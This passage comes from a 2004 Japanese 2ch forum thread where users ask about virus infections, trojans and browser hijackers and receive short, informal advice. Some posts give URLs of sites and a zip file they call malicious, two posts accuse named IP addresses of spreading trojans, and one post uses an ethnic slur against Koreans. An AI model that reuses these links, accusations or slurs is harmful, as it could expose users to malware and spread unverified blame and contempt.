このサイトにあるウィルスサイトを踏んでしまいました。
私のOSはWinXPなのですが、感染はしているのでしょうか?
XPは影響を受けるシステム外になっていました。
このまま放置しておいてよければいいのですが
XPでも感染しているのであれば
なにかしらの対処をしようと思いますので。
よろしくお願いします。


836 :名無しさん@お腹いっぱい。:04/01/07 08:51
>>835
実際に踏んだウィルスサイトは
h t t p : / / free.hostdepartment.com/u/u01/step1.html
これです。


837 :名無しさん@お腹いっぱい。:04/01/07 09:08
>>835
心配ならスキャンしてみれば?


838 :名無しさん@お腹いっぱい。:04/01/07 11:18
>>836
そのサイトと>> 835のシマンテックのウィールスデータベースと
どういう関係にあるんだ? そもそもどうして>> 836がウィールス
サイトとわかった?

あと、こういう質問するときは最低でもOSとセキュソフト(アンチ
ウィールスなど)の有無、オンラインスキャン済かどうかなど
報告汁。でないとまともなレスはつかんぞよ。


839 :838:04/01/07 11:20
おっとスマソ。OSはXPだったんだなw 

840 :名無し:04/01/07 11:41
別にエロサイトなんて見てないんですが・・・

>815

841 :名無しさん@お腹いっぱい。:04/01/07 13:02
ちょっと相談なんですが、先だって知り合いからメールがきたのですが
件名が「WormKlez。E immunity」と
「Re:dalinng」、「Some quwstions」、「Detected」、「ありがとう」
と5件のメールが届いたのですが、中身が「Audgp.pifファイルやUPWLbvp.exeファイル」
が入っていました.「KlezE・・・」、「Detected」、「ありがとう」は開いてません。
多分悪戯気分でやったのだと思いますが(この人たち50後半と60前半の人たちです)
「Audgp.pifファイルやUPWLbvp.exeファイル」は開いてしまったので気になります。
開いたのはGooのフリーメール受信フォルダ上で実行してしまいました。
このプログラムに関して情報のある方よろしくお願いいたします。

842 :名無しさん@お腹いっぱい。:04/01/07 13:51
>>841
ttp://www.trendmicro.co.jp/klez/

>【 ワーム特性について】
>このようなタイプのワームでは、「差出人」を感染コンピュータ内で取得した
>任意のメールアドレスとして「設定する場合があり ます。
>そのため「差出人」として設定されているメールアドレス使用者の
>コンピュータが感染しているとは限りません。

あんたが開いたのは送信者偽装してウイルス送ってくるklezだろ。
その50後半と60前半の人がいたずらでやった可能性はかなり低い。
アンチウイルス使ってないのか?

843 :名無しさん@お腹いっぱい。:04/01/07 15:42
>>842
返信ありがとう御座います。AVG6、AD-wardなどで検索してみましたが、
発見されませんでした。
それと皆別々にきた物で、KlezEで届いたメールは開いてません。
webメール上で開いたのが「Audgp.pifファイルやUPWLbvp.exeファイル」
この二つです。この別々のメールが関連してた可能性はあるでしょうか。
それと任意のアドレスですが登録していない物もありました。
まず、心配なのは「Audgp.pifファイルやUPWLbvp.exeファイル」が
どんなプログラムなのかまたwebメール上でどんな動作をするのかです。
情報ありましたらお願いします。
pif・・・Windows上でDosアプリケージョンを実行できるようにする情報ファイル。
のようです。


844 :名無しさん@お腹いっぱい。:04/01/07 16:50
2ちゃん見てたらどうやらMacro.srcってのに感染したっぽいです。
ノートンで検疫してみたのですが、その後検疫してても意味ないかと思い
検疫項目より消してみて、
オンラインスキャンとかを試してみたあとに、再起動後
再度オンラインスキャンをかけたら感染は見つかりませんと出たのですが、
これは駆除に成功したとみていいのでしょうか?
ちなみに更新期限が過ぎてるのでノートンはアップロードできず、
ほぼ役に立たない状態です;

845 :名無しさん@お腹いっぱい。:04/01/07 16:58
>>844
>2

846 :名無しさん@お腹いっぱい。:04/01/07 17:26
trojan,killfilesってゆーウイルスでノートンに怒られたのですが
ファイルにアクセスできませんってな感じでした。。。
今のとこ問題ないようですが、大丈夫でしょうか?

847 :名無しさん@お腹いっぱい。:04/01/07 17:58
>>838
詳細を書きます。
OS:XP Pro
セキュリティソフト:入っていません。
オンラインスキャン:しておりません。
よろしくお願いします。

848 :名無しさん@お腹いっぱい。:04/01/07 21:02
スキャンしてないならしろよ。

849 :名無しさん@お腹いっぱい。:04/01/07 21:05
>>847
釣ってるわけじゃなさそうだが…

だからどうしてそのサイトにウィールスがあると(ry

もう一度>>833読んでくれ。

850 :849:04/01/07 21:07
スマソ。上のリンクは>> 833 ではなく>>838


851 :名無しさん@お腹いっぱい。:04/01/07 21:34
CD-ROMとHDDの転送速度が低下するウイルスもしくはドライブ自体を壊すウイルスってあるのでしょうか?
症状としてはCD1枚分をHDに転送するのに30分ぐらいかかります。今までは7〜10分位だったと思います。

この症状になる前(12/31の早朝だったかな?)に起動後に重くて何も出来なくなる状態になったので
ウイルスに感染したのかと思いあきらめてOSを再インストールしたのですが直りませんでした。重くなる状態は直りました。
次にIDEのコードがおかしくなったのかと思い付け替えたところ何故かBIOSの設定が初期化されました…

ノートンでスキャンしましたが感染0でした。OSはWindows2000です。

852 :名無しさん@お腹いっぱい。:04/01/07 21:45
>>851
と同じような症状でFDDがやたら遅くなる。
ウィルスの可能性ありってどこかに書いてあったのを見たのですが
良い解決策ありませんか?
スキャンでは見つけられませんでした。

853 :790:04/01/08 19:06
一週間以上レスなしか・・・

854 :名無しさん@お腹いっぱい。:04/01/08 20:24

アウトルック エクスプレスを利用しています。
友人から添付ファイル付きの電子メールを受信しました。

 ATT00000.htm
  ~~~~
      ↑
     数字は電子メールを開けるごと
     毎回変わる(数字が約6増える)

送信先に確認しましたところ添付した覚えがないとのことで
送信する電子メール全てを
ウィルススキャンしているとのことでした。

私の環境に何らかの悪が潜んでいるという事でしょう。

これに関する詳しい情報を所持していらっしゃる方は
ぜひ、対策(駆除)方法を教えていただけないでしょうか。

また、ウィルスかスパイウェアでしたら名称を教えていただけると
とてもありがたいです。よろしくおねがいします。

855 :名無しさん@お腹いっぱい。:04/01/08 22:15
>>854
html形式で送信してるんじゃない?
http://66.102.7.104/search?q=cache:uME47AqHJUkJ:www21.ann.co.jp/pas/bbs/pslg13323.html+ATT00000.htm+%E6%B7%BB%E4%BB%98&hl=ja&lr=lang_ja&ie=UTF-8&inlang=ja
ここらへん参考になるかな

856 :名無しさん@お腹いっぱい。:04/01/09 00:08
>>854
http://pas.ann.co.jp/bbs4/pslg13323.html

857 :856:04/01/09 00:10
>>855
ケコーン・・・ていうか、新着チェックするの忘れた・・・

858 :名無しさん@お腹いっぱい。:04/01/09 00:23
最近ポート901をよく叩かれるんだけど、新種のワームかなんかですか?

859 :名無しさん@お腹いっぱい。:04/01/09 02:22
今何気に思ったのですが
ウィルスに感染するというこは
どういうことなんでしょうか。
なんとなくファイルやレジストリに感染するっていうのは分かる
んですけど、なんか納得いかないんです。
ウィルスがPCに感染するってどういうことなんですか?

860 :自営業:04/01/09 06:06
お早う御座います。前に取引のあった方から私のメアドのあて先で
ウィルスメールが送られてきたとメールがきました。そこで
その方にお詫びの連絡を差し上げた所届かずに代って
-------------------------------------------------------------------
お客様が送信されたメールは、Virus Scanサービスによって
駆除できないウイルスが発見された為、
メールを送信することができませんでした。
お客様ご利用のPCがウイルス感染している可能性がありますので、
以下の情報を参考に、ウイルス感染のご確認をお願いいたします。
-------------------------------------------------------------------
こういうメールがきました。このメールには私のPCが「W32.Yaha.F@mm 」
に感染していると書いてあります。私は3ヶ月前にPCを購入し、
商売を始めたばかりでどうしたら良いのか分りません。プロバイダ(dion)の
無料ウィリスチェックでは感染の事実は認められませんでした。
osはXPです。死活問題なのです。どうかご助言ください。

861 :名無しさん@お腹いっぱい。:04/01/09 06:36
ttp://www.cyberpolice.go.jp/detect/observation.html
8日18時頃から何が起こり始めたのか誰か教えて。

862 :名無しさん@お腹いっぱい。:04/01/09 11:32
>>861
VeriSignと関連してるんかな。俺も知りたい

863 :名無しさん@お腹いっぱい。:04/01/09 12:09
何か起こってるみたいだね。
自分自身もKlezが送りつけられて着たし
知り合いからもパソコンが大変なことに・・・って留守電入ってた。
結構大きい規模で何かやらかしたのかな?
誰か情報たのむ。

864 :名無しさん@お腹いっぱい。:04/01/09 12:51
BackDoor-AWQ.b を知ってやってきますた
このおにゃのこは誰ですか?

865 :コウチャン:04/01/09 14:20
この前、パソコンを終了させて一度終わったんですが、
もうひとつやりたい事があり、もう一度電源をつけたのですが、
ログインすると、起動音はなるのですが、
画面にアイコンとかが出てくる前に再起動してしまいます。
そこで、もうひとつのパソコンで検索したら、「Lovsan」
というウイルスに症状が似ていて、いろんな対処法を試してみよう
としても、プログラムが実行できないので対処できません。

だれか、どうすればイイのか教えてください(´ω`)

※HDDをリカバリする以外の方法でお願いします。

866 :名無しさん@お腹いっぱい。:04/01/09 14:34
>>865
セーフモードは?

867 :名無しさん@お腹いっぱい。:04/01/09 22:18
プライバシーアラートっていうのが右下に良く出ます。
your computer may be recording many or all of your internet activities. personal privacy protection is possible. see what may be on your computer.〜って感じの文字が出ます。
すごく長い英語なので訳してみたら「あなたのコンピューターは多数あるいはあなたのインターネット活動のすべて記録しているかもしれません。個人のプライバシー保護は可能です。何があなたのコンピューター上にあるかもしれないか確かめてください」とでました。
これってやばいですか?!
別に普通につかってるだけなんですけど…。



868 :名無しさん@お腹いっぱい。:04/01/09 22:35
>>867
質問がくだらない上にマルチだからな…

セキュリティ初心者質問スレッドpart35
http://pc.2ch.net/test/read.cgi/sec/1072675686/271


869 :名無しさん@お腹いっぱい。:04/01/09 23:28
マルチって?

870 :名無しさん@お腹いっぱい。:04/01/10 03:58
初ウイルス感染記念下記子
TROJ_WINPUP.B   3箇所感染、2回ブロック
9日の朝にWBアップデートしたけど、昨夜感染してたみたい。
悪質なウイルスじゃなくて良かった。

871 :名無しさん@お腹いっぱい。:04/01/10 17:03
漏れも観戦報告
TROJ_ISTBAR.I(TrojanDownloader:Win32/IstBar.P)   1箇所観戦

たいしたこと無かったが、最近発見されたものらしく英語しか対処方法が分からずに
我が英語力のなさに落ち込み。

872 :870:04/01/10 20:45
ネットはじめてから4〜5年たつけど、初めてだったので
凄くあせった。うちのも対処方が英語だった。
何か知らんがここ2日間、家のPC攻撃されまくりなんですけど。
ウイルス手動駆除してVB2004の更新を最新にしてから、
すでに30回以上隔離してるんだけど。
今までだとブロックなんて数ヶ月に1回ぐらいだったのに。
やっぱりルータ導入したほうがいいのかな。

873 :名無しさん@お腹いっぱい。:04/01/11 02:40
>>872
木馬潜んでないか?

874 :名無しさん@お腹いっぱい。:04/01/11 05:52
>>872
Restoreフォルダから何度も同じものを検出してたりして

875 :名無しさん@お腹いっぱい。:04/01/11 06:07
>>782
>何かわからないことがあればどんどん聞いてください。
http://www.mizuhobank.co.jp/
>ここから、インターネットバンキングに入る!

そのメールは HTML メールではなかった?
www.mizuhobank.co.jp のリンク先は本当に www.mizuhobank.co.jp だった?

876 :名無しさん@お腹いっぱい。:04/01/11 06:39
http://jhtrd44.hp.infoseek.co.jp/cgi-bin/xzx/src/xzx0002.zip
スレ違いかもしれないですが、これをアーバインでダウンロードしたら、HTMLファイルがおちてきて
WINDOWS エクスプローラがネットにアクセスし始めたんですが、
これってトロイなんでしょうか・・・?
すごく不安なので、トロイなどだったときの対処方法を
どうかよろしくお願いします。

877 :名無しさん@お腹いっぱい。:04/01/11 06:46
>>876追加
OS WIN98 Zone Alarm使用 
シマンティックのオンラインウィルススキャンはやりましたが
反応なしでした

878 :名無しさん@お腹いっぱい。:04/01/11 07:00
>>782
有名企業を語る事件もいくつか起きてるので心当たりがなければ無視、
みずほに口座もってる場合は銀行に問い合わせればいいのでは?

大体銀行がyahooのフリーメール使う事自体怪しいだろ

879 :誰か助けて;;:04/01/11 07:45
こんにちわ、始めまして。
最近インターネットでとあるHPを見てからというもの、トップページがそのHPに強制的になってしまいます。
インターネットオプションで設定し直してもまたそのHPになってしまいます。
それだけなら良いのですが、お気に入りに知らない(見たこともない)のが3ツ追加されていて、それも正規の方法で取り除こうとしても削除されません。


880 :誰か助けて;;:04/01/11 07:46
このような状況になってから、インターネットが重く、一時ファイルがやたらに溜まりやすくなってます。これも一時ファイルの削除を行なっても、すぐにまた溜まってインターネットが重くなってしまいます。
友人の話では、その様になるプログラムが奥深く入り込んでいるので、
本体を初期化するしか方法がないのでは?っと言っています。
他に方法はないのでしょうか? 
よろしくお願いします。



881 :名無しさん@お腹いっぱい。:04/01/11 09:20
>>879
スパイウェアのスキャン駆除をしてみては
http://higaitaisaku.web.infoseek.co.jp/trouble.html

変更されるサイトのアドレスなり書けばまた違う回答もあるかも

882 :872:04/01/11 11:02
>>873 874
感染してから隔離警告が出続けたのが、時間にして
15時間くらいで、その後何にも出なくなったんだけど。
因みに、その間ウイルススキャンでは、一切検出されなかった。
874  隔離されたウイルスは、その都度削除したんだけど
    それでも検出されるの?
873  TROJを駆除してからは、更新できるようになったから
    (感染中は出来なかった。)
    駆除は出来てると思う。

883 :名無しさん@お腹いっぱい。:04/01/11 12:06
ウィルスをファイルに仕込む際、実行ファイルとアーカイブファイル以外にも
仕込むことは可能ですか??
MPGとかJPGとか

884 :名無しさん@お腹いっぱい。:04/01/11 12:16
>>883
MPGは知らんが、JPGはありますよ。
2chのどこかでそれを紹介しているHPを紹介しているスレがあったはずだが・・・・
>>885後は世路。

885 :名無しさん@お腹いっぱい。:04/01/11 12:24
PDFとかMP3,WMVなら知ってる

886 :誰か助けて;;:04/01/11 12:47
>>881
問題が解決しました。何だか前より高速になったような^^;
貴方様は私にとって神様です。
忙しいのにスレ頂き本当に感謝しています。
ありがとうございました。


887 :名無しさん@お腹いっぱい。:04/01/11 12:56
>>886
それは何より。
再び引っかからないように〜

888 :名無しさん@お腹いっぱい。:04/01/11 12:56
>>884
>>885
(((( ;゚Д゚)))ガクガクブルブル

889 :名無しさん@お腹いっぱい。:04/01/11 13:14
>>887
マルチにまぢレスしる ノー天気ハッケソ!

890 :名無しさん@お腹いっぱい。:04/01/11 15:11
>>889
マルチにレスしてるやつをチェックしてるイタイやつハッケン!

891 :名無しさん@お腹いっぱい。:04/01/11 16:26
>>890
マルチにレスしてるやつをチェックしてるやつをチェックしてる
煽られると顔を真っ赤にして書き込んでる香具師。

892 :名無しさん@お腹いっぱい。:04/01/11 16:48
AVGが
C:\System Volume Information\
に.exeファイルのウィルスを発見するのですが、ウィルススキャンしても見つけられません。
しかし、定期的に警告が出ます。
System Volume Informationフォルダにアクセスしようとしても拒否されてしまいます。
どうにかならないでしょうか。アドバイスよろしくお願いいたします。

893 :名無しさん@お腹いっぱい。:04/01/11 16:50
>>892
復元ポイントの破棄

894 :名無しさん@お腹いっぱい。:04/01/11 16:51
答えはここにある

http://search.yahoo.co.jp/bin/query?p=System+Volume+Information+%a5%a6%a5%a4%a5%eb%a5%b9

895 :名無しさん@お腹いっぱい。:04/01/11 21:20
>>893>>894
的確なアドバイスありがとうございました!
無事解決いたしました。感謝です!!

896 :名無しさん@お腹いっぱい。:04/01/13 00:36
Backdoor.Optix.BI
が検出されたんですがどうしたらいい
探してもみつからない

897 :名無しさん@お腹いっぱい。:04/01/13 08:42
新型 Windows XP Service Pack 1 (Express) - Critical Update

http://headlines.yahoo.co.jp/hl?a=20040113-00000010-inet-sci

誰かメール来ましたか?

898 :名無しさん@お腹いっぱい。:04/01/14 02:50
今日、初めてウィルスにやられたようなのですが、当方ノートン使用
Macro.src というウイルス(性質ワイルド)。一応駆除したのですが
いまいち、このウイルスの特徴がわかりません。初心者なので教えていただけると
ありがたいのですが。

899 :岐阜−筑陽:04/01/14 03:00
マクロウィルス

900 :名無しさん@お腹いっぱい。:04/01/14 04:06
サイトの管理をしています。
今日、自分のサイトをi-modeで見てみたら、覚えのない広告がサイトの
下の隅の方に1ピクセル並みのリンクが貼られているのを見つけました。
クリックすると「桃色吐息」というアダルトサイトです。
ビルダーでサイト作りをしているのですが、ビルダー上で見てもそんな
タグは無く、PCでは確認できないのにi-modeでのみ見れます。
これはウィルスなんでしょうか?

901 :名無しさん@お腹いっぱい。:04/01/14 05:40
>>900
鯖側で自動的に広告が入るという訳ではなく?

902 :名無しさん@お腹いっぱい。:04/01/14 09:14
http://etc.2ch.net/test/read.cgi/qa/1073748785/
↑で質問させていただいてたんですが、やっぱりこちらに来ました。

http://pc2.2ch.net/test/read.cgi/hp/1069230901/850
↑このリンク先のファイルを落として何を思ったかexe実行してしまったんです。
で、怖くなってタスクマネージャ見たら、上のが原因か定かじゃないんですが、
何か今まで見覚えのないプロセスがいっぱいあって、もうあたふたしてます。

以下初心者質問で書いた引用です
>今までユーザー名の項目には<自分のuser名>とSYSTEMしかなかったような気がするんですが、
>"NETWORK SERVICE"と"LOCAL SERVICE"ってのがsvchost.exeのイメージ名で堂々といるんですよ
>他にもcsrss.exeとかlsass.exeみたいないかにも怪しいのがうようよと・・
>んで、このNETWORK...とかでググっても期待したのは出てこないんで、
>svchostをググッたら、やれワーム、やれトロイってアホほど出てくるんです。
>もうマジでびびってます。。。
こんな感じなんですが、なにかアドバイスいただけないでしょうか?

903 :名無しさん@お腹いっぱい。:04/01/14 09:23
>>902
そう不安になるならとりあえずウィルス駆除ソフト買ってきて常駐するのを勧めるよ

実行したのがビューワー.exeというのならVB2004では反応なし。


904 :名無しさん@お腹いっぱい。:04/01/14 09:45
>>903
res有難うございます。
書くの忘れてたんですが、買ってはないですけど、
一応AVGとAD-AWARE、それにオンラインのトロイのやつでスキャンして
何も出なかったんで、取り合えず少し様子見て、
おかしかったらos再インスコします。
お騒がせしました。

905 :名無しさん@お腹いっぱい。:04/01/14 12:37
質問させていただきたいのですが
朝にネットをしてからPCの電源が起動後一時間位で強制的に
落ちるようになってしまいました
アドバイスをお願いします

906 :名無しさん@お腹いっぱい。:04/01/14 14:12
>>901
解決しました。
古いindexページを削除して、新しく新規でページを作り直したら
i-mode上からも広告が消えました。
サーバーの使用なのかと、同じサーバーの方のindex(この広告はindexにのみ
入る)をi-modeで確認したら、そんな広告入ってなかったので仕様では
ないと思いました。原因は未だ不明ですがウィルスではないようです。
どうも有難うございました。

907 :名無しさん@お腹いっぱい。:04/01/14 14:12
ie-spyad  IE専用制限ゾーンとブロックすべきクッキーリストのレジストリパック
http://www.staff.uiuc.edu/~ehowes/resource.htm

908 :名無しさん@お腹いっぱい。:04/01/14 14:17
重たいサイトに入れなくなるウイルスってありまつか?携帯用サイトくらいしか入れないでつ。 ゲームなどは起動できまつが、アニメや映画が見れないのでつ_| ̄|○ アドバイスお願いします(ノД')

909 :岐阜−筑陽:04/01/14 14:20
>>905
ブラスター?

910 :名無しさん@お腹いっぱい。:04/01/14 15:01
>>909
そうなんですか
検索して見ます
ありがとうございました

911 :名無しさん@お腹いっぱい。:04/01/14 16:04
実況板糞コテランキング
http://www.finito-jp.net/vote1-1/comvote.cgi?id=live2

やたらとウイルスコード貼り付けるR.O.D -THE_ヘ ル バ-って奴を1位にしましょう。

912 :うーん:04/01/14 17:52
先日ウイルスの定期チェックを行ったところ6つのファイルが感染しているという結
果がでました。
調べてみたところエリートのHPよりダウンロードしたL4SMG651/5.0用の
miniIDE ドライバのファイルが
感染していたようで
\SIS_20~1.ZIP:\SiS\setupdir\0c0c\The.exe Warning:
Hidden extension .exe


\SIS_20~1.ZIP:\SiS\setupdir\000a\Panda.exe
Warning: Hidden extension .exe

D:\ダウンロード\SIS_204A.ZIP:\SiS\setupdir\0c0c\The.exe Warning: Hidden
extension .exe

D:\ダウンロード\SIS_204A.ZIP:\SiS\setupdir\000a\Panda.exe Warning: Hidden
extension .exe

D:\解凍ファイル\SIS\SETUPDIR\000A\PANDAT~1.EXE repaired  (ファイル名はPanda
Titanium Crack.zip)

D:\解凍ファイル\SIS\SETUPDIR\0C0C\THEWOR~1.EXE (ファイル名はThe world of
lovers.txt)

の6つのファイルが感染しているとのことでした。
常駐ソフトにはAVGを使っているんですが、
なぜか感染しているとでてるにも関わらず2つのファイルしか修復しないし
隔離もできません。
あとウイルスバスターオンラインスキャンでは異常なしとのことでした。
はっきりいってパニックっているので
となたかご教授いただけると幸いです
どうぞよろしくお願いします。

913 :名無しさん@お腹いっぱい。:04/01/14 17:54
>>912
OSクリーンインストール

914 :名無しさん@お腹いっぱい。:04/01/14 18:08
>>912
これでつか?
ftp://ftp.ecs.com.tw/driver/mb/ide/sis/sis_204a.zip

DLしてみた。
たしかにAVGではひっかかるが、ノートンではスルー。
AVGの問題じゃないの?

915 :名無しさん@お腹いっぱい。:04/01/14 18:12
>>912
もう一回ウイルスかどうか確認したら、エリートに知らせろよ。
別なサイトで確かめたほうがより確実性が上がるな。
シマンテックのオンラインスキャンでもやれば。

で、もし本当に感染しているなら、エリートが感染してないドライバーを出すだろ?
そしたらドライバーの入れ替え、で終了〜。

916 :うーん:04/01/14 18:16
>913
はい!まさにそれです!
あと削除についてなんですが、できないのはZIP状態のものだったようで
これは解決しました。
しかし上で902さんがおっしゃってるようなプロセス(lsassとか。。。
これらは何か問題のあるプロセスなんでしょうか?)が
作動しまくっているようでかなり気になっています
削除成功とでれば問題はもうないと考えてもよいのでしょうか?
オフィシャルのHPでもこういうのがあるかと思うと。。。
なんか怖いですね^^;
それとも913さんがおっしゃってるようにAVGの誤作動かな?
だといいんですけど。。。




917 :うーん:04/01/14 18:19
>913は>914の間違いでした!ごめんなさい!!!

918 :906:04/01/14 20:19
解決したと思ったら解決してませんでした。
何度やっても1ピクセルのアダルトリンクが混入します。
こんどは「メルパニ」ってところ。
別のサーバーもあるのでそっちからアップしても
そのリンクが入ったので、私のPCの問題ではないかと。
やはりウィルスなんでしょうか?

919 :名無しさん@お腹いっぱい。:04/01/14 21:46
pariteに感染してしまって、AVGでスキャンは出来るのですが、削除することができません。
ノートン買えば削除は出来ますか?

920 :名無しさん@お腹いっぱい。:04/01/14 22:54
>>918
というかあなたのパソコンにウィルスが潜んでるかどうかのチェックが先では?

921 :名無しさん@お腹いっぱい。:04/01/15 02:54
「トロイの木馬」を発信している人のIP
218.41.135.142 (p29878e.tkyoac00.ap.so-net.ne.jp)

922 :名無しさん@お腹いっぱい。:04/01/15 03:01
Winnyユーザーに必死な会社の中の人
218.45.8.222 -> f984.nnc.or.jp

923 :名無しさん@お腹いっぱい。:04/01/15 11:58
ByteVerityに感染し駆除出来たのですが、いつどうやって感染したかよく判りません
ぐぐっても判らなかったのですが、どういった経路で感染するものか教えて下さい

924 :名無しさん@お腹いっぱい。:04/01/16 01:48
最近異常なほど文字化けするんですがウィルスでしょうか?
一応スキャンしてみたんですがひっかかりませんでした
それになんか動作がおそいし


925 :名無し募集中。。。:04/01/16 02:33
>>924
ウイルスでないとしたらフォントキャッシュが原因では?
一度フォントキャッシュを削除して様子を見てください。

926 :名無しさん@お腹いっぱい。:04/01/17 01:06
>>925ありがとん
やってみまつ

927 :名無しさん@お腹いっぱい。:04/01/17 03:41
トレンドマイクロのオンラインスキャンができないんだけど。
俺だけ?


928 :名無しさん@お腹いっぱい。:04/01/17 03:55
そういえばウイルスバスターの本スレでも、
みんな出来ないって書いてたな。

929 :名無しさん@お腹いっぱい。:04/01/17 09:29
>>927
僕も出来ない


930 :名無しさん@お腹いっぱい。:04/01/17 14:32
NIS2002をまだ使ってます
そのうちのNAVについてですが、
LOVE LETTERの例の文字列が貼られているスレッドに反応するのはしょうがないとして、
先ほど、今までのような、ウィンドウが現れて、クリックで処理をするのではなく、
突然全面赤画面になってキー入力をする方法になりました
もちろん同じスレッドで起きました
なぜこうなったんですか?再起動をしたら直りましたが・・・
心配且つ疑問なので質問です


931 :名無しさん@お腹いっぱい。:04/01/17 19:46
最近ポート4455ばっか突かれるんだが・・・

932 :名無しさん@お腹いっぱい。:04/01/17 20:32
>>930
スレ違いみたいで他で聞く

933 :名無しさん@お腹いっぱい。:04/01/17 20:47
>>930
ノートンスレで聞け
【ノートン】インターネットセキュリティ Ver.37【2004】
http://pc.2ch.net/test/read.cgi/sec/1073792659/

934 :名無しさん@お腹いっぱい。:04/01/17 20:57
>>930はマルチだな

935 :名無しさん@お腹いっぱい。:04/01/18 03:13
ttp://www.samurai.fm
当方、此処からfeature archiveを聞こうとしたところ、突然ノートン反応。
危険!スクリプト遮断しますか?とか出てきてとりあえずしといたんですが。
後で見てみるとVBS.loveletter.varというのが検疫項目に入ってました。
オンラインウイルス辞典なども見てみたのですが、「メール」「ワーム」とか
書いてあって謎です。
その時メッセもoutlookも起動してなかったので、原因は上記のwebくらいしか
思い付きません。
しかし当方としてはどうしてもそのサイトの音楽が聞きたいのでどうにか
したいのです。でもまた出たら怖い。でもホントにあれが原因?
どうも此方の道に疎いので、何方か教えて頂けると有難いです。

936 :935:04/01/18 03:16
あと書き込むとき「あなた騙されてますよ?」って出たんですけどあれは何?
当方怯えの為少々神経質になっております。なので謎は解決しておきたいのです。
重ね重ね失礼致します。

937 :名無しさん@お腹いっぱい。:04/01/18 09:51
>>934
>>932で移動宣言してるじゃん
マルチ見つけるのが趣味?

938 :名無しさん@お腹いっぱい。:04/01/18 20:50

バイオニクス・ドルフィン

ほすぃ。

939 :名無しさん@お腹いっぱい。:04/01/18 20:52
>>937
>>932はマルチにスレ違いと言っているだけなんじゃないの?
>>937=930か?

940 :名無しさん@お腹いっぱい。:04/01/18 21:38
>>930=>>932だろ

941 :名無しさん@お腹いっぱい。:04/01/18 21:50
>>940
>>932>>930に自分が自分自身にレスしてるの?

まあ、こんな事などどうでも良いのだが。

942 :名無しさん@お腹いっぱい。:04/01/18 22:05
>>941
そういう書き込みだと読んでいたか…

確かにどーでも良いことだ終わろう

943 :名無しさん@お腹いっぱい。:04/01/19 13:51
おまいら、W32.Beagle.A@mmに感染してないのか?

944 :名無しさん@お腹いっぱい。:04/01/19 22:16
explore.exeでエラーが発生しました的なメッセージがでて
ネットに繋げなくなります。
こないだMSブラスト駆除してからなんですけど
どこが悪いのでしょう?

945 :名無しさん@お腹いっぱい。:04/01/20 00:55
>>944
じゃExplorer入れ直して味噌。
メッセージ出してくるのはOSなのか?
ブラスタは何を使って駆除した?

質問するときはOS、接続環境(プロバ、ルータの有無)、
セキュ(アンチウィールス、FW、その他)書け。



946 :名無しさん@お腹いっぱい。:04/01/22 11:15
ところで実はここは偽スレなのだな
http://pc.2ch.net/test/read.cgi/sec/1068311899/
こちらへいらっしゃいな

947 :名無しさん@お腹いっぱい。:04/01/22 13:20
ええ、ちょっと説明します。現在このスレ

ウィルス情報&質問 総合スレッド☆Part15 に加えて
【正式】ウィルス情報&質問 総合スレッド☆Part15
http://pc.2ch.net/test/read.cgi/sec/1068300966/

とが並立してます。なんでこうなったかというのはハナシが長くなるんで
アレですがw、ここでpart16立てちゃうとまた並立が続いてしまいます。

【正式】part15の方を埋めてからあらためて【統一】part16立てるほうが
質問者も戸惑わないでいいと思うんですがいかがでしょう?

948 :名無しさん@お腹いっぱい。:04/01/22 16:11
>>947
伺わなくていい。
そうすればいい。
そうしろ。

ここを早いとこ埋めて
【正式】ウィルス情報&質問 総合スレッド☆Part15
http://pc.2ch.net/test/read.cgi/sec/1068311899/
に、移動しる。

949 :名無しさん@お腹いっぱい。:04/01/22 16:12
>>947
リンク違ってるな。

950 :名無しさん@お腹いっぱい。:04/01/22 16:23
>>949
略して、リンクが違うぞ山田君だな。

951 :名無しさん@お腹いっぱい。:04/01/23 00:07
ルータのログ見たら半端じゃない数のTCPパケットが4662に飛んできてる。

952 :名無しさん@お腹いっぱい。:04/01/23 00:11
検索したらedonkeyとか言うP2Pソフトのようだ。
そんなもんやってないんだけどなぁ、前にこのIPを使ってた奴がやってたのかな。
何でも馬鹿チョン国では大人気らしい、接続し直してIP変えるか。

953 :名無しさん@お腹いっぱい。:04/01/23 01:48
======================
このスレは埋め立て中です。次スレは↓に合流です
【正式】ウィルス情報&質問 総合スレッド☆Part15
http://pc.2ch.net/test/read.cgi/sec/1068311899/

 注意★このスレのpart16を立てないように★注意
======================

954 :名無しさん@お腹いっぱい。:04/01/23 13:56
埋め立て

955 :ume:04/01/25 11:34


956 :名無しさん@お腹いっぱい。:04/01/25 19:08
はじめまして、質問房ですみませんがよろしくお願いします。
TROJ_ISTBAR.Kというウイルスに感染したのですが、どうにも
駆除方法、削除方法がわかりません・・・・
すみませんが、よろしくお願いします。

957 :名無しさん@お腹いっぱい。:04/01/25 21:00
>>956
マルチ乙。


うめぇ〜たて。

958 :名無しさん@お腹いっぱい。:04/01/25 22:18
======================
このスレは埋め立て中につき、質問は↓ここへどうぞ
【正式】ウィルス情報&質問 総合スレッド☆Part15
http://pc.2ch.net/test/read.cgi/sec/1068311899/

 注意★このスレのpart16を立てないように★注意
======================


959 :名無しさん@お腹いっぱい。:04/01/25 22:45
>>957
お主のカキコを見たら、なぜか無性に梅干しが食べたくなったぞw

960 :名無しさん@お腹いっぱい。:04/01/25 23:01
>>959
うめ おいしいよね。
毎年自分で作ってるから、うめ きらしたことないです。

生つば でてきた。

961 :名無しさん@お腹いっぱい。:04/01/25 23:08
>>960
俺も肛門からつくしんぼが出てきた。

962 :名無しさん@お腹いっぱい。:04/01/25 23:16
>>961
もうすぐ春ですね〜♪

963 :名無しさん@お腹いっぱい。:04/01/26 00:13
恋をしてみませんか♪

964 :名無しさん@お腹いっぱい。:04/01/26 01:00
貴方も狼に変わりますかぁ〜?♪

965 :名無しさん@お腹いっぱい。:04/01/26 03:03
======================
このスレは埋め立て中につき、質問は↓ここへどうぞ
【正式】ウィルス情報&質問 総合スレッド☆Part15
http://pc.2ch.net/test/read.cgi/sec/1068311899/

 注意★このスレのpart16を立てないように★注意
======================
くだらない雑談をカキコするのはぜんぜん釜居ません

966 :占有屋(弟) ◆Ck9628Zw6A :04/01/26 04:13
c⌒っ*゚д゚)っφ 記念カキコ

近いうちにいずれまた

967 :名無しさん@お腹いっぱい。:04/01/26 04:14
http://www.yao123.com
というサイトを見たら、ホームページが、上記のサイトになってしまい変わりません・・
インターネットオプションの「標準設定」を押しても、このサイトになってしまいます。
解決方法はありますでしょうか?

968 :名無しさん@お腹いっぱい。:04/01/26 06:50
>>967
ザンネンながらこのスレでは解決しない。

969 :名無しさん@お腹いっぱい。:04/01/26 12:32
>>967 たった2個上にあるこんなでかいコピペが目に
入らないのか?
======================
